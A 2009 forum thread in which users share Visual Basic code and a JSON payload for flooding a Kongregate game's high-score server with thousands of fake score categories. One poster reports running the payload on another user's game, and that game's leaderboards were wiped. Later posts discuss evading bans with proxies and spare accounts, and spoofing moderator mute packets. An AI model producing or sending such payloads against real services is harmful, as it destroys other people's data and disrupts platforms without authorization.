Theory to make a game unplayable
-migrated-
Theory to make a game unplayable Posted on: 04/18/2009 5:47am
Quote Post
I had this idea if you could craft a packet with as much as 1000 variables in it

wrote a simple program
Code: [Select]
Const starter As String = "{" & """" & "name" & """" & ":" & """"
Const ender As String = "" & """" & "," & """" & "value" & """" & ":1},"
Private Sub Command1_Click()
Text1.Text = "[" & bf() & "]"
Text1.Text = Replace(Text1.Text, ",]", "]")
End Sub

Function bf() As String
Dim ans As String

Dim a, b, c As Integer
For a = 97 To 122
For b = 97 To 122
For c = 97 To 122
ans = ans & starter & Chr$(a) & Chr$(b) & Chr$(c) & ender 'aaa-zzz
DoEvents
Next c
Next b
Next a
bf = ans
End Function

output didn't even fit in textbox since the limit is 65kb of data so I attached half of it.

and send it to server, it will create 1000 new sections in the view highscores place.

Possible things that might happen
1) it would make a game lag alot because of all the catagories it has to search to submit like kills if you playing some killing game.
2) it would most likely get the add new sections bug patched
3) it might get kbh patched
4) it might get you banned
5) it might just do nothing but create a bunch of catagories.

I know this may sound childish but someone should try it and post results

I haven't risked it could be dangerous!.
Re: Theory to make a game unplayable Posted on: 04/18/2009 9:20am
Quote Post
System Bot
If you're not going to try it out, I doubt anyone else will :roll:

This post was imported from an account that no longer exists!
Previous Name: Hex
Re: Theory to make a game unplayable Posted on: 04/18/2009 9:55am
Quote Post
Creamy Goodness.
Quote from: "Hex"
If you're not going to try it out, I doubt anyone else will :roll:

Are you trying to get us banned?

lol idek why i still come here

Re: Theory to make a game unplayable Posted on: 04/18/2009 10:16am
Quote Post
I'll try it later. I have a roving IP address and I'm on a proxy, I'll also use a spare account that I don't care about, I've got loads of them.

Check before you post, someone may have beaten you there.

Don't fear my banhammer, fear the God holding it...

Re: Theory to make a game unplayable Posted on: 04/18/2009 2:41pm
Quote Post
I tried it out, didn't work...I'm not sure why not.

Tookie

Re: Theory to make a game unplayable Posted on: 04/18/2009 3:00pm
Quote Post
Right, I tried it out on FlowerPower (sorry, KH (broken image removed)) and it seems that the games only accept a certain amount of variables ... 22 to be exact.

http://www.kongregate.com/games/myGamesSuck/flower-attack-beta-v1

Oh, and for this game I had to change the code that pk posted to have every variable with "HighScore-HighScore" first ... the other way wasn't working.

Oh, and this is rather dangerous I would think, as doing this to Kongai or DTD or any other popular game, would wipe out the scoreboards, and the MrRubix's would be royally pissed off.

(KH, it seems that the highscores were lost on your game, sorry)

Code: [Select]
[{"name":"HighScore-HighScoreaa","value":1},{"name":"HighScore-HighScoreab","value":1},{"name":"HighScore-HighScoreac","value":1},{"name":"HighScore-HighScoread","value":1},{"name":"HighScore-HighScoreae","value":1},{"name":"HighScore-HighScoreaf","value":1},{"name":"HighScore-HighScorecq","value":1},{"name":"HighScore-HighScorecr","value":1},{"name":"HighScore-HighScorecs","value":1},{"name":"HighScore-HighScorect","value":1},{"name":"HighScore-HighScorecu","value":1},{"name":"HighScore-HighScorecv","value":1},{"name":"HighScore-HighScorecw","value":1},{"name":"HighScore-HighScorecx","value":1},{"name":"HighScore-HighScorecy","value":1},{"name":"HighScore-HighScorecz","value":1},{"name":"HighScore-HighScoreda","value":1},{"name":"HighScore-HighScoredb","value":1},{"name":"HighScore-HighScoredc","value":1},{"name":"HighScore-HighScoredd","value":1},{"name":"HighScore-HighScorede","value":1},{"name":"HighScore-HighScoredf","value":1},{"name":"HighScore-HighScoredg","value":1},{"name":"HighScore-HighScoredh","value":1},{"name":"HighScore-HighScorefq","value":1},{"name":"HighScore-HighScorefr","value":1},{"name":"HighScore-HighScorefs","value":1}]
etc...

Tookie

Re: Theory to make a game unplayable Posted on: 04/18/2009 3:34pm
Quote Post
Re: Theory to make a game unplayable Posted on: 04/18/2009 3:42pm
Quote Post
lmfao...

Re: Theory to make a game unplayable Posted on: 04/18/2009 4:57pm
Quote Post
lol i guess its useless other then flooding highscores with crap lol nice KongregateHack, tookie
Re: Theory to make a game unplayable Posted on: 04/19/2009 1:12am
Quote Post
So, basically, we can f... up high scores...but the whole idea of making a game unplayable...isn't viable.

Tookie

Re: Theory to make a game unplayable Posted on: 04/19/2009 4:28am
Quote Post
I still don't see how this idea would make a game unplayable. It would just make it lag. Besides, it doesn't load the high scores until you request it, when you click on which high score you want.
Re: Theory to make a game unplayable Posted on: 04/19/2009 6:06am
Quote Post
What you should do is find someone who happens to be a mod on kong *winks* and see if they'll record a packet the next time they mute someone. I highly doubt it would work, but you never know hell look at all the exploits there are for websites etc. I looked through the chat's programming and didn't really find anything useful that might be used to spoof being a mod or something along those lines though. I didn't spend a whole hell of a lot of time trying though. I'm thinking as long as it isn't server sided there may be a way to send mute commands etc. It may check to see whether or not the account / session id / both of them in question is marked as a mod or not though before any mod related commands can be used though.
Re: Theory to make a game unplayable Posted on: 04/19/2009 3:01pm
Quote Post
Quote from: "Gameace"
What you should do is find someone who happens to be a mod on kong *winks* and see if they'll record a packet the next time they mute someone. I highly doubt it would work, but you never know hell look at all the exploits there are for websites etc. I looked through the chat's programming and didn't really find anything useful that might be used to spoof being a mod or something along those lines though. I didn't spend a whole hell of a lot of time trying though. I'm thinking as long as it isn't server sided there may be a way to send mute commands etc. It may check to see whether or not the account / session id / both of them in question is marked as a mod or not though before any mod related commands can be used though.

i.e. packet sending mutes? That's be awesome beyond compare!!!

Tookie

Re: Theory to make a game unplayable Posted on: 04/19/2009 5:59pm
Quote Post
(broken image removed)

Nothing is more awesome than that prank.

Re: Theory to make a game unplayable Posted on: 04/19/2009 7:24pm
Quote Post
Creamy Goodness.
Quote from: "Maximillian"
(broken image removed)

Nothing is more awesome than that prank.
ROFL!

lol idek why i still come here